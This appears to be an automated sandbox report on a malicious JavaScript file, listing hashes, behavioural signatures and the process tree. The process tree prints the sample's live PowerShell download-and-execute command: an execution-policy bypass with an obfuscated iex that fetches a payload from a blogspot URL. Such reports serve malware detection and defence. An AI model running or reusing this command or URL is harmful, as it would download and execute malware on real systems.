Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-12-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
Resource
win10v2004-20241007-en
General
-
Target
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
-
Size
82KB
-
MD5
03844efc838d98e3a3aa6f935a2ff1db
-
SHA1
11c08db7fa610ff1a9e2bf7fb5e34015ceceec4f
-
SHA256
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98
-
SHA512
a34ed6ea22b9f6c1ebbae01d15fec736612039b6ab2d45984ef65a5cf53046be44d5e97dbb160735634c2c18103f0751782db47e5f00ace65d73591d85128928
-
SSDEEP
768:7AK3GmGyO9RsGGx5osXrmsGaO95b9iyCfxAO111y21NHvlZupREEpRfr5onZWRUX:GZeGX2unjA06
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2112 wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2244 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2112 wrote to memory of 2244 2112 wscript.exe 31 PID 2112 wrote to memory of 2244 2112 wscript.exe 31 PID 2112 wrote to memory of 2244 2112 wscript.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://11-14hotelmain.blogspot.com///////chutmarao.pdf);Start-Sleep -Seconds 3;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244
-